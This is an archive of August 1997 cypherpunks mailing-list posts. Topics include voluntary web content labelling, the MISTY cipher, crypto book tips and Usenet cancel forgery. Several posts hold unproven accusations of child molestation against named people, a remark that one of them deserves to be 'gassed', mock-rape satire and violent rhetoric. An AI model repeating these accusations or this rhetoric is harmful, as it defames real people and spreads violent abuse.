> to "adult" tastes will label themselves; most sites that explicitly
> cater to children will label themselves; but the vast majority of
> sites won't bother.  The fact that this system is not perfect is not
> an issue -- realspace separation is not perfect either.
>
> --
> Kent Crispin                            "No reason to get excited",
> kent at songbird.com                       the thief he kindly spoke...
> PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
> http://songbird.com/kent/pgp_key.html

Actually I have nothing against categorization.  Sci Fi, Dick and Jane,
Romance
Mystery, Horror, Erotica.  Those are categories.  The difference in
Meatspace
is that Mommie and Daddy usually don't let little Susie go to the
bookstore
alone.  If they go with her (the c-space equivalent of watching her
surf)
then they probably won't stand by as she picks up the latest copy of
Lady Chatterly.

As far as I'm concerned parents have a moral duty to filter what their
little ones read, I just don't want the Feds or Microsoft deciding what
the categories are.

Like I said -- most people who care about these things don't mind
if people from their church take the kids to the bookstore.  I assume
that they trust their values.

On the other hand I don't want a "surgeon general's warning" on
Lady Chatterly.  I know you think this is voluntary, but eventually
some parents will get irate over little susie seeing something that
they thought was inappropriately labeled.  A lawsuit will ensue
and then voluntary will be a tautology for mandatory.

It already is in the tax world.  And that, my friend, is the very
thing that Orwell spoke of.  Change the language so that love
means hate, peace means war, good is evil, volutary is mandatory.

As much as I detest censorship I don't have a problem with parents
deciding what their little kids should look at.  In fact I really like
the idea of having churches sell their own filtering software.  What
better way to check your values.

I can't believe the churches haven't thought of this before.  Usually
they don't miss a beat when it comes to generating funds for, ahem,
noble causes.

Maybe I'll suggest it.

Jim

BTW: It looks like communicator is formatting my text correctly again.

---------------------------------------
When the world is running down
   make the best of what's still around
                                -sting







From nobody at REPLAY.COM  Wed Aug  6 16:55:04 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 7 Aug 1997 07:55:04 +0800
Subject: Forced Censorship vs. Fucking Your Brains Out
Message-ID: <199708062340.BAA24470@basement.replay.com>



Kent Crispin wrote:
 Have you ever noticed that there
> are "childrens books" sections in the library? 

  Great place to meet "babes," huh Kent?

> You don't complain about physical segregation of children's books,
> or keeping children out of bars.

  I certainly do. I would locate books in a way such that the children 
would be exposed to a variety of materials, instead of herded into 
playpens according to age and size.
  Also, in areas where children are allowed in bars if they serve food,
or until a certain time of night, the atmosphere tends to be raised 
above just being a place for the parents to drink and get drunk.
  A 14 year-old guitar player named Little Charlie used to play with me
at the Austex Lounge in Austin, and the liquor laws required him to 
leave the bar when the band was not onstage. He spent the breaks out
in the parking lot, smoking dope and screwing his brains out with the
young groupies. (My liver is gone, and his dick fell off. Thanks to
the law, I won.)

> So presumably you wouldn't complain about some technical means of
> creating an analog in cyberspace? 
> If so, then voluntary labelling is not so bad.

  I think that a library-type cataloguing system adapted to the unique
form of the InterNet and WWW could be the greatest thing since sliced
bread. I would love not to have to visit 400 sites to find "hardware"
plumbing instead of "women's" plumbing (and vice-versa). Likewise, I
would rather not waste the bandwidth of myself and others when they
visit my site in error, thinking "arson" has to with fires, and not
with sex.

  The problem is that the words "voluntary" and "requirement" have,
through some weird mutation of DoubleSpeak, become synonyms.
  Hardly anybody even tries to pretend, anymore, that they are not 
planning to trample the constitution and fry anyone that gets in their
way when the ElectroMagnetic Curtain clangs shut.
  Even the Nazi's, in the early days, made some pretense of humanity
when shipping fellow humans to the death camps. "Jaccuzzi? No, I don't
thinks so, sir, but I'm certain there are plans for one. Now, climb
aboard, please." Eventually, the reign of terror reached the point where
it was all clubs and guns, with no need for pretense of humanity.

  When the gun-thievery began in earnest, the thieves still had to lie
in bigger and bigger stages, tearing small, then larger, pieces off the
Constitution at each step of their con game.
  With privacy and freedom, however, we have now reached a stage where
the pretense of democracy is perfunctory, with the fascists who are
rattling the chains standing on the stage behind the speaker as he or 
she assures us that "imprisonment for life will be a _voluntary_ 
requirement."

  The person I really feel bad for is Tim May. He used to at least be
able to tell people, "I told you so! Check the archives from my 
previous life, and..."
  Prophecy loses its luster once _everybody_ can predict the future, 
and things have reached the point where everyone recognizes their
cues in the march toward the "Tear-Stained Monologue" where, in an
allegorical way, "The good-guy gets the girl. _I_ wind up dead."

  Face it, we all know where the cattle-cars are going, but they are
carrying _other_ people--for now. Child molesters, drug dealers, and
similar robbing, raping, low-down vermin who shouldn't have any rights,
anyway.
  Oh, and a lady who put a quarter in a stranger's parking meter. And
a 16 year old kid who shared a joint with a 15 3/4 year old friend. And
a guy who pulled a stink-bomb prank on a government office.
  Oh yes, and an employee at Livermore Labs who pledged allegiance to
the flag every day of his life, escrowed his crypto keys with the 
government even before it was required by law to do so, but forgot about
the PGP 2.1 key on the floppy he's been using to shim up the short-leg
of the couch on the front porch for the last few years.

  What are the major players in the computer and media industries 
planning in their secret meetings about the best way to require you
and I to "volunteer?"
  They are planning to collectively "take one step back," leaving us
("voluntarily") standing in the line of fire.
  When the call to assembly comes, I plan on being the first one to
line up. I think I'll position the line "one step ahead" of the land
mines I plant the night before.

TruthMonger






From rah at shipwright.com  Wed Aug  6 17:15:42 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 7 Aug 1997 08:15:42 +0800
Subject: Introduction of MISTY
Message-ID: 




--- begin forwarded text


From: =?ISO-2022-JP?B?GyRCNUhJcCEhPV8bKEo=?= 
To: "'set-dev at terisa.com'" ,
    "'set-discuss at lists.Commerce.Net'" 
Cc: 'atsuhiro' ,
    'etakeda' ,
    'hirosato' ,
    'kotaro' ,
    'saeki' ,
    'maekawa' 
Cc: 'matsui' ,
    'nakawaji' ,
    'sakagami' ,
    'toka' ,
    'yositake' 
Subject: Introduction of MISTY
Date: Wed, 6 Aug 1997 10:51:38 +0900
Mime-Version: 1.0
Sender: set-discuss-owner at iss.isl.melco.co.jp
Precedence: bulk

+----------------------------------------------------------------------+
This message was addressed to:  set-discuss at lists.commerce.net
+----------------------------------------------------------------------+

Hello,

For those people who don't know MISTY, which is listed in "Algorithm
independence" of "Input requested for SET version 2.0 priorities",
please let me introduce it to you.

MISTY is a symmetric key cryptographic algorithm and has the following
excellent features:

(1)  Provable Security
    MISTY is mathematically proved to be strong enough against the
  two types of known cryptanalysis attack --- differential cryptanalysis
  and linear cryptanalysis.

(2)  High Performance
    MISTY has a parallel computation nature as an algorithm. So you can
  achieve high performance on both software and hardware. The algorithm
  itself does NOT depend on any special platforms.

You can also get the information about MISTY from the following Web pages.
    http://mitsubishielectric.com/TechShowcase/Text/tsText06.html
    http://www.melco.co.jp:80/rd_home/map/j_s/topics/new/misty_e.html

Please feel free to ask any questions to us. We would be happy to answer
your questions.


Jun Yoshitake

Senior Research Engineer
Information Security Department
Information Technology R & D Center
Mitsubishi Electric Corporation

5-1-1 Ofuna, Kamakura, Kanagawa 247, JAPAN
Phone : +81-467-41-2182,  FAX : +81-467-41-2138
yositake at iss.isl.melco.co.jp

-------------------------------------------------------------------------
This message was sent by a majordomo-based automatic list manager.
Subscriptions to and archives of this list are available to any person
or organization.  For further information send a mail message to
'set-discuss-request at lists.commerce.net' with 'help' (no quotations)
contained in the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From dlv at bwalk.dm.com  Wed Aug  6 17:32:59 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Aug 1997 08:32:59 +0800
Subject: Eternity Uncensorable?
In-Reply-To: 
Message-ID: <37H2ae9w165w@bwalk.dm.com>



? the Platypus {aka David Formosa}  writes:

> On Wed, 6 Aug 1997, Adam Back wrote:
>
> > Mark Grant  writes:
>
> [...]
>
> > > so all that a government need do to censor a particular site is to
> > > scan for those messages and issue cancels.
>
> > - I understand cancels are ignored a lot of places, due to problems with
> >   censorous people, and pranksters issuing tons of forged cancels.
>
> And alot like to use canceles.  If censorus groups (not neccery the
> goverment) starts canceling we may be able to create a resector like that
> used in news.admin.net-abuse.*

A clarification is in order:

The "resurrector" in news.admin.net-abuse.* is run by none other than
the child-molesting pedophile Chris Lewis.  It does NOT repost
cancelled articles when the author is someone Lewis doesn't like
- such as myself.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From kent at songbird.com  Wed Aug  6 17:33:49 1997
From: kent at songbird.com (Kent Crispin)
Date: Thu, 7 Aug 1997 08:33:49 +0800
Subject: "Voluntary Censorship" vs. Govt Legislation
In-Reply-To: <33E8C4FA.3E6DDBAC@ssds.com>
Message-ID: <19970806170411.10495@bywater.songbird.com>



On Wed, Aug 06, 1997 at 04:44:08PM -0600, Jim Burnes wrote:
[...]
> Actually I have nothing against categorization.  Sci Fi, Dick and Jane,
> Romance Mystery, Horror, Erotica.  Those are categories.  The difference in
> Meatspace is that Mommie and Daddy usually don't let little Susie go to the
> bookstore alone.

I think you missed my point about spatial segregation.  It's not that
I don't let little Susie go to the bookstore alone -- I live 10 miles
from the bookstore, and she *can't* go to the bookstore alone.  In
other words, I don't have to watch her all the time in meatspace,
because there are *safe areas* where I can let her play without
supervision.  You get this kind of "categorization" of space for free
in meatspace -- it's a fundamental topological property that
cyberspace doesn't have. 

And in fact, no parent I know watches their children all the time --
it is simply not possible for most people.  Every parent I know builds
or finds "safe areas" where children can play unsupervised.

[...]

> 
> As far as I'm concerned parents have a moral duty to filter what their
> little ones read,  I just don't want the Feds or Microsoft deciding what
> the categories are.

Neither do I.

[...]

> On the other hand I don't want a "surgeon general's warning" on
> Lady Chatterly.  I know you think this is voluntary, 

No, clearly you don't know what I think.  Please do me the courtesy of
disabusing your mind of that thought.  When I said "voluntary" I meant
voluntary, not some Orwellian variant of the word, OK?  Voluntary.  Not
"mandatory voluntary", not "surgeon general's warning", not
"government approved", not "war is peace".  Voluntary.  So, keeping
your mind firmly wrapped around that, remember that I said I saw value
to voluntary labels.  I did not say I favored government mandated
labels, or Microsoft mandated labels.  Voluntary labels, like the big 
adult sites already use.  Voluntary labels, like the "k12" usenet 
hierarchy. 

[...]

> In fact I really like
> the idea of having churches sell their own filtering software.  What
> better way to check your values.

Filtering and labels are orthogonal (you can filter on things other
than labels), and, of the two, I prefer filtering.  Filtering creates
virtual neighborhoods, and gives a more complex topology to
cyberspace. 

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From nobody at neva.org  Wed Aug  6 17:39:53 1997
From: nobody at neva.org (Neva Remailer)
Date: Thu, 7 Aug 1997 08:39:53 +0800
Subject: MicroGorilla Postpones Rocket-Launch Plans Until..."likely sometime next year."
Message-ID: <199708070027.TAA14764@dfw-ix8.ix.netcom.com>




>Anonymous wrote:(c)
> > The "Not-News Gorilla NutWork" was rocket-launched in the Mohave Desert
> > early yesterday morning  by a rag-tag bunch of paramilitarist computer
> > gurus who unveiled an InterNet Bill of Bytes that included the words,
> > "MicroSoft shall make no laws..."

Steven Vonder Haar wrote, the very next day:
> Microsoft Corp. has tabled plans to include new technology in its
> Internet Explorer 4.0 browser that would have made "news" oriented
> sites exempt from content rating standards promoted for use on the
> Internet.

>Anonymous wrote:(o)
> > Angered by a self-appointed council of computer industry magnates who
> > have announced their intention to seize fascist control of the quickly
> > burdgeoning Information Highway by controlling the definition of all
> > information, the rebels set up a shooting range which contained a wide
> > variety of targets ranging from copies of the Wall Street Journal to
> > life-sized cardboard cut-outs of a hooded figure referred to only as,
> > "a billionaire to be named later."

Steven Vonder Haar wrote, the very next day:
> RSAC President C. Dianne Martin said Microsoft is running out of time
> to implement the separate designation for news sites before the launch
> of the 4.0 version of Explorer later this year.

>Anonymous wrote:(e)
> >   "We have decided on two classes of ratings." explained a tassle-
> > haired young woman as she slid shells into a Winchester Defender
> > sitting on her lap. "On..." she said, lifting the shotgun with one
> > hand, then liberating the hooded head from a nearby cardboard cut-out,
> > before turning back to say, with a Cheshire grin, "...and _off_."

Steven Vonder Haar wrote, the very next day:
> However, the company
> plans to include the news designation in the 5.0 version of Explorer
> when it is made available..."likely sometime next year."







From mnorton at cavern.uark.edu  Wed Aug  6 17:54:41 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Thu, 7 Aug 1997 08:54:41 +0800
Subject: "Voluntary Censorship" vs. Govt Legislation
In-Reply-To: <33E8FE38.476CD40@ssds.com>
Message-ID: 




On Wed, 6 Aug 1997, Jim Burnes wrote:
> 
> Actually I have nothing against categorization.
(snip)

Then you have nothing against labelling.
> 
> As far as I'm concerned parents have a moral duty to filter what their
> little ones read, I just don't want the Feds or Microsoft deciding what
> the categories are.
> 
But it's ok for Barnes&Noble and Borders to decide what the categories
are?  And the Motion Picture Association of America? I'd suggest you 
must accept that parents will use whatever tools are available to
help them exercise their "moral duty", and if that means they choose
to let Bill Gates decide what the categories are, so what?

> Like I said -- most people who care about these things don't mind
> if people from their church take the kids to the bookstore.  I assume
> that they trust their values.
> 
Whose values, the churchmembers' or the bookstores'?  Either way, 
"don't mind" is different from "want to".

> On the other hand I don't want a "surgeon general's warning" on
> Lady Chatterly.  I know you think this is voluntary, but eventually
> some parents will get irate over little susie seeing something that
> they thought was inappropriately labeled.  A lawsuit will ensue
> and then voluntary will be a tautology for mandatory.

But you'll accept a categorization of Lady Chat?
> 
> It already is in the tax world.  And that, my friend, is the very
> thing that Orwell spoke of.  Change the language so that love
> means hate, peace means war, good is evil, volutary is mandatory.

There has never been a voluntary tax, that worked. "Tax" and "volunteer"
are mutually exclusive terms.

> As much as I detest censorship I don't have a problem with parents
> deciding what their little kids should look at.  In fact I really like
> the idea of having churches sell their own filtering software.  What
> better way to check your values.

Now you're on to something. What better way to check your church's
values.

> I can't believe the churches haven't thought of this before.  Usually
> they don't miss a beat when it comes to generating funds for, ahem,
> noble causes.

They have, with regard to books, a long time ago. Admittedly, that
list didn't have anything to do with money, however.
> 
> Maybe I'll suggest it.

I don't think you need to:)
MacN






From jrennie at hardy.ocs.mq.edu.au  Wed Aug  6 18:10:27 1997
From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE)
Date: Thu, 7 Aug 1997 09:10:27 +0800
Subject: Old Cryto stuff,
Message-ID: 



Can anybody suggest any good books on old cryto techniques ?? I'm finally 
learning to program, along with the stuff i've got to learn as part of 
the class i thought i would make a start on learning to code 
crypotgraphic algorithms. I was after some old ones that are simple to 
code in software. Unfortuently the one in the back of the Schnier book 
are a little to complex for my limited programming knowledge so far. 

So can anybody help or will i just be ignored like i have been at other 
times ? 

Jason =8-]






From dlv at bwalk.dm.com  Wed Aug  6 18:23:59 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Aug 1997 09:23:59 +0800
Subject: Forced Censorship vs. Fucking Your Brains Out
In-Reply-To: <199708062340.BAA24470@basement.replay.com>
Message-ID: 



nobody at REPLAY.COM (Anonymous) writes:
>   Face it, we all know where the cattle-cars are going, but they are
> carrying _other_ people--for now. Child molesters, drug dealers, and
> similar robbing, raping, low-down vermin who shouldn't have any rights,
> anyway.

Yes - child molesting pedophiles like Chris Lewis deserve to be gassed.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From janzen at idacom.hp.com  Wed Aug  6 18:25:59 1997
From: janzen at idacom.hp.com (Martin Janzen)
Date: Thu, 7 Aug 1997 09:25:59 +0800
Subject: Links re. crypto in Canada
Message-ID: <9708070116.AA19886@sabel.idacom.hp.com>




A while ago, someone was asking about the status of cryptography in
Canada.  You may be interested in the following links, courtesy of
Electronic Frontier Canada's David Jones:

    EFC's Draft Statement on Canadian Cryptography Policy
       http://www.efc.ca/pages/crypto/policy.html

    Can you keep a secret? - Canadian Crypto: true, strong, free
       http://www.theconvergence.com/columns/djones/08021997/

    Entrust skirts export rules on encryption software
       http://www.efc.ca/pages/media/globe.29jul97.html

    Canadian Product Puts New Spin on Encryption Debate
       http://www.efc.ca/pages/media/nytimes.01aug97.html

    It's the law vs. privacy in high-tech debate
       http://www.efc.ca/pages/media/ottawa.citizen.06aug97a.html

--
Martin Janzen           janzen at idacom.hp.com






From nobody at REPLAY.COM  Wed Aug  6 18:51:31 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 7 Aug 1997 09:51:31 +0800
Subject: "Voluntary" Bullshit
Message-ID: <199708070137.DAA10966@basement.replay.com>



Kent Crispin didn't have any better sense than to write:
> 
> When I said "voluntary" I meant
> voluntary, not some Orwellian variant of the word, OK?  
> Not "mandatory voluntary"

  I know what a "label" is. What is a "voluntary" label?
  A "voluntary" label is nothing more than a threat, plain and simple.
It is the first volley in a coming war of censorship.

  The town I live in sent me a form for paying a "voluntary" fine
for my dog running loose. I thought that was great. I sent them a
letter telling them I would pay my "voluntary" fine when I came in
for my "voluntary" execution.
  I'm old enough to know better, but I was still naieve enough to
be surprised when a gun-toting Mountie with handcuffs and mace and
two billy clubs dropped by to ask me when I was going to pay my 
"voluntary" dog fine. Sure enough, it turns out that if I fail to
pay the "voluntary" fine, a man with a gun comes with a summons 
requiring me to answer to the charge in the presence of the King.
{Not Elvis}
  I walked down to the city office with my dog, who came in and ran
around sniffing the Mountie and city employees as I paid their fine
for not cruelly imprisoning her. I asked how much I owed them for 
not beating her, too, but they just looked at me funny until I left.
  And this is a small country town, with "voluntary" stop signs.

  I think I'll get a knife or gun, climb through a bedroom window,
and find someone who wants to "voluntarily" have sex with me.
  "Ma'am, the reason I climbed through your window in the middle
of the night was to protect your children from inadvertantly
walking in and viewing the obscenity that's about to take place.
  "As a matter of fact, I think there is pending legislation to
_require_ you to have sex with me when I crawl through your
bedroom window in the middle of the night. It's for your own
protection, so that I don't have to bring a weapon, next time."

VoluntaryMonger
"I _choose_ to be an asshole."






From ravage at ssz.com  Wed Aug  6 18:56:59 1997
From: ravage at ssz.com (Jim Choate)
Date: Thu, 7 Aug 1997 09:56:59 +0800
Subject: Old Cryto stuff, (fwd)
Message-ID: <199708070147.UAA06482@einstein.ssz.com>



Forwarded message:

> From: Jason William RENNIE 
> Date: Thu, 7 Aug 1997 10:53:04 +1000 (EST)
> Subject: Old Cryto stuff, 

> Can anybody suggest any good books on old cryto techniques ?? I'm finally 
> learning to program, along with the stuff i've got to learn as part of 
> the class i thought i would make a start on learning to code 
> crypotgraphic algorithms. I was after some old ones that are simple to 
> code in software. Unfortuently the one in the back of the Schnier book 
> are a little to complex for my limited programming knowledge so far. 
> 
> So can anybody help or will i just be ignored like i have been at other 
> times ? 

Dover makes several very inexpensive reprints of books that have at least
some historical impact.

Cryptanalysis: a study of ciphers and their solution
Helen Fouche' Gaines
ISBN 0-486-20097-3
$4.50

Some topics include:

transposition                              concealment devices
nihilist transposition                     the turning grille
substitution                               consonant-line short cut
miltiple alphabet                          gronsfelt, porta, & beaufort
kasiski method                             vigenere' decryption
periodic number cyphers

includes several frequency tables and other neat stuff in appendixes


Number Theory and It's History
Oystein Ore
isbn 0-486-65620-9
$9.95

Some topics include:

euclids algorism                           prime numbers
aliquot parts                              indeterminate problems
linear indeterminate                       diophantine equations
congruences                                wilson's theorem
eulers theorem                             converse of fermats theorem

Hope it helps.

                                                 Jim Choate






From dlv at bwalk.dm.com  Wed Aug  6 19:07:46 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Aug 1997 10:07:46 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <19970802124946.15945@math.uiuc.edu>
Message-ID: <4DL2ae16w165w@bwalk.dm.com>



Tim Skirvin  writes:
> >Yes, there are lots of folks who forge cancels for "inappropriate cross-
> >posts" in the "big 8".
>
> 	Not accepted ones.  They're treated as rogues, and asked to stop
> it, and you know it.

Net.Scum like Chris Lewis, Jan Isley, Tim Brown, Bob Curtis, etc are treated
as rogues by me and my friends and told to stop by me and my friends - and
if they don't stop, we usually get their plugs pulled.  Tim Skirvin defended
net-abuse by Jan Isley, just as he defends the "UDP" against UUNet.

> > Please be advised that all of Tim Skirvin's FAQs are full of lies (except
> > for the parts plagiarized from David Stodolsky :-).
>
> 	Umm, no.

Examples of lies in Tim Skirvin's Magnum Opus, the "Cancel FAQ" (what else):

1.


]What is a Cancelbot?
]
]	A Cancelbot is a program that searches for messages matching a
]certain pattern and sends out cancels for them all.
]
]
]Sounds cool.  Where do I get one?
]
]	If you have to ask, you don't get one.
]
]
]What?  Why not?

My cancelbot has been freely available for over 18 months.  I've pointed
this out repeatedly to Tim Skirvin who continues to provide an answer to
a truly frequently asked question that reflects Skirvin's view of what
the reality should be, rather than the reality.

2.

]What is Dave the Resurrector?
]
]	After a particularly obnoxious run of cancels from ixc.net,
]Chris Lewis decided that it was time to write a program to repost stuff
]that was cancelled on news.admin.net-abuse.misc.  The Resurrector, named
]Dave, was the result.
]
]	The effect of this is that cancels to news.admin.net-abuse.misc
]are not effective unless Chris says so.

It has been pointed out many times that Chris Lewis does NOT repost cancelled
articles when he doesn't like the authors, such as myself.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From tcmay at got.net  Wed Aug  6 19:37:52 1997
From: tcmay at got.net (Tim May)
Date: Thu, 7 Aug 1997 10:37:52 +0800
Subject: IG Farben and the Legitimate Needs of Law Enforcement
In-Reply-To: <199708062340.BAA24470@basement.replay.com>
Message-ID: 



At 4:40 PM -0700 8/6/97, Anonymous wrote:
>
>  When the gun-thievery began in earnest, the thieves still had to lie
>in bigger and bigger stages, tearing small, then larger, pieces off the
>Constitution at each step of their con game.
>  With privacy and freedom, however, we have now reached a stage where
>the pretense of democracy is perfunctory, with the fascists who are
>rattling the chains standing on the stage behind the speaker as he or
>she assures us that "imprisonment for life will be a _voluntary_
>requirement."

An early member of the Eric Conspiracy Research Labs, Eric Blair, correctly
noted the abuse of language that is necessary to make anything go down with
minimum fuss...

>  The person I really feel bad for is Tim May. He used to at least be
>able to tell people, "I told you so! Check the archives from my
>previous life, and..."
>  Prophecy loses its luster once _everybody_ can predict the future,
>and things have reached the point where everyone recognizes their
>cues in the march toward the "Tear-Stained Monologue" where, in an
>allegorical way, "The good-guy gets the girl. _I_ wind up dead."

Don't cry for me, Canada.

It was also obvious to me several years ago that things would reach a point
where everyone could see what was coming. The curare of the government has
of course paralyzed many.

Nothing left but the shooting.

(I have been arguing that CFP shut down their pointless conferences...the
same old same old repeated every year. Alas, they are still planning their
big shindig in Austin next year. )

>  Face it, we all know where the cattle-cars are going, but they are
>carrying _other_ people--for now.

However, there is a progress toward an industry-friendly consensus on the
export of IG Farben's products: Farben will receive Most Favored Gasser
status in exchange for assisting with the Legitimate Needs of Law
Enforcement.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From dlv at bwalk.dm.com  Wed Aug  6 20:18:53 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Aug 1997 11:18:53 +0800
Subject: Qualcomm employee attacks the remailers
In-Reply-To: <25455.870651372@zelkova.qualcomm.com>
Message-ID: 



Paul Pomes  writes:

> |Paul Pomes sends me harrassing e-mail and quotes more obscenities from
> |the anonymous remailers:

such as:

]I take this all to mean that you are Master Cocksucker Dimwit Vulis?

> As you posted the obscenities in the first place I fail to understand your
> objections.


Lie from Pomes: I never in my life sent anything to this motherfucker.

Another lie from Pomes: a few days ago the motherfucker wrote:

]Subject: Re: Entrust Technologies's Solo - free download
]From: Paul Pomes 
]Organization: Qualcomm, Inc.
]To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
]Cc: freedom-knights at jetcafe.org
]Date: Wed, 30 Jul 1997 09:13:52 -0700
]Message-Id: <9502.870279232 at zelkova.qualcomm.com>
]Sender: ppomes at Qualcomm.com
]
]At 9:22 EDT on Wednesday, July 30, 1997, Dr.Dimitri Vulis KOTM wrote:
]
]|I ask everyone on these two forums to inform Northern Telecom Forgers /
]|Bell North Forgery Research / Entrust that we will boycott their
]|"security" products as long they continue to employ the child-molesting
]|pedophile Chris R. Lewis - the biggest forger on Usenet.
]
]Sorry, I'm afraid that honor belongs to you, Dimi.  What I will do is
]killfile you as also the biggest un-cultured twit on Usenet.  High honors
]of a sort.
]
]/pbp

Clearly Pomes lied about having killfiled me.

Pomes harrasses anonymous remailer operators: he has been complaining to
Jeff Berches's employer and upstream, contributing to his decision
to shut down the cajones remailer:

]To: abuse at hotwired.com, abuse at bbnplanet.net, remailer-admin at cajones.com
]        jeff at hotbox.com, ops at bbnplanet.com, toxic at content.org,
]        dgaudet-djg20 at arctic.org
]From: Paul Pomes 

Tim Skirvin condones and supports net-abuse by Net.Scum like Pomes,
Hannigan, and Varshavchik.

Please tell Qualcomm what you think about their employee attacking
the anonymous remailers.






From dlv at bwalk.dm.com  Wed Aug  6 20:20:26 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Aug 1997 11:20:26 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: 
Message-ID: 



? the Platypus {aka David Formosa}  writes:

> On Sat, 2 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > I'm sorry, I don't see how posting megabytes of noise every day can
> > swamp the content.
>
> You don't recall the poetry feastavil?  What about the sex groups for the
> less popular fetishes?

Can you hurt a person by sticking needles in a doll representing this person?
Possibly, if the person really believes this.

Why do people try to flood newsgroups with shit? (We can agree that some
do try to, whether they succed or not). Most of the time it happens because
some asshole is trying to take ownership of an unmoderated newsgroup and
disses people whom he's trying to silence.  Some of the assholes resort
to forging cancels; most limit their censorship to postmaster complaints,
false accusation of "spamming", and occasional mailbombs.

Examples from the Net.Scum rogue collection: Scott Kellog from Sematech
falsely accuses various people of "spamming" his newsgroup, but hasn't
been caught forging cancels yet.  On the other hand Bob Curtis has taken
over alt.smokers.cigars and forges cancels for articles that merely
question his "ownership" of the newsgroup. Do read - it's very enlightening.

The biologist Garrett Hardin published an essay, _The Tragedy of the Commons_
in _Science_, Dec 13, 1968.  Many misguided people have NOT read the eassay,
but like to cite it.  They argue that according to Hardin, Usenet would be
used more "efficiently" if every newsgroup had an "owner" - a self-appointed
"mediator" (their favorite title - don't know what asshole first came up
with it). They try to assert property rights where they can't be enforced
and succed only in pissing off a lot of people whom they tried to censor.

If you were told that a formerly common meadow is now owned by a self-
appointed asshole who disses you, would you litter on the meadow, shit
and piss on it, and possibly dump toxic radioactive waste on it?  When
the self-appointed "owner" pisses off a lot of people, some of them
will - especially since they can get away with it.

This reminds me of the encosure movement in medieval England that sought
to make the use of common lands more "efficient" by privatizing them -
causing numerous peasants extreme misery.  Read your history.

The good news is that newsgroup floods don't really hurt anyone except
the egos of the assholes who claim to "own' the affected newsgroups.

> > Moreover, if such actions were indeed cause a problem, they would not be
> > eliminated with payments. Some people would be willing to spend money to
> > "flood" the net
>
> Here we aggry, porn4pron and others will still make a proffet from
> spamming.  Infact puting a cost to posting creates a biase aggainst
> unpopulare options and towards spam.  Indeed such a payment system would
> make the problem worce.

I like the idea of encouraging news readers to send e-cash (possibly via
anon remailers) to the posters whose writings they like and would like to
see more of.  This is a generalization of the discussion we had on the
cypherpunks list a few months ago, how companies could send e-cash to
Usenet posters who say good things about their products.

Porn4porn posts A LOT of crap in alt.sex.* and admits that it's crap.
It then asks the readers: instead of wading through our crap for free,
why not pay us to get the prn you're looking for?  And my response is:
why not just killfile the idiots, or why not choose to not select
their crap for reading - it's easily identifiable.

Do you remember all the talk about "intelligent internet agents" who were
supposed to look for stuff we're interested in - like the one that would
learn the user's tastes for music, and suggest more music that he'd
probably like; the one that learned the user's scheduling preferences to
manage his appointment calendar; well, here's an excellent idea for an
AI project for a master's thesis - write an agent that learns what the
user likes to read and finds it on Usenet (irrespective of where it's
posted) and doesn't bother showing the user what he doesn't want to read.

> > Instead of discouraging the behavior you don't like, encourage the
> > behavior you do like.
>
> [Nods]  The good old blow job prinisipul.

Yep. Works great with kids and animals.

> > I invite Adam and David to subscribe to the freedom-knights mailing list
> > (send 'subscribe freedom-knights at jetcafe.org' to majordomo at jetcafe.org)
> > if you want to continue this not-quite-crypto discussion there.
>
> I have attempted to do so in the past,  and will attempt to do so again.

There's some interesting discussion going on there in addition to my xposts.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From kent at songbird.com  Thu Aug  7 17:44:13 1997
From: kent at songbird.com (Kent Crispin)
Date: Thu, 7 Aug 1997 17:44:13 -0700 (PDT)
Subject: forged cancels (Re: Entrust Technologies's Solo - free
In-Reply-To: <199708071951.MAA21851@adnetsol.adnetsol.com>
Message-ID: <19970807173814.48963@bywater.songbird.com>


On Thu, Aug 07, 1997 at 12:53:16PM -0700, Ross Wright wrote:
[...]
> 
> For no reason whatsoever should you cancel a message you did not send 
> yourself.

How about if it is an employee of yours, using your computer
equipment, that sent the message, in explict contradition to your
companies stated policy? How about if it is your 5 year old child who
just sent a 5 megabyte spam to 500 groups? What if the message is
forged in such a way that it looks exactly as if it came from you?
What if the sender asks you to cancel it because they don't know how?

Absolutist thinking is *almost* always wrong :-)

-- 
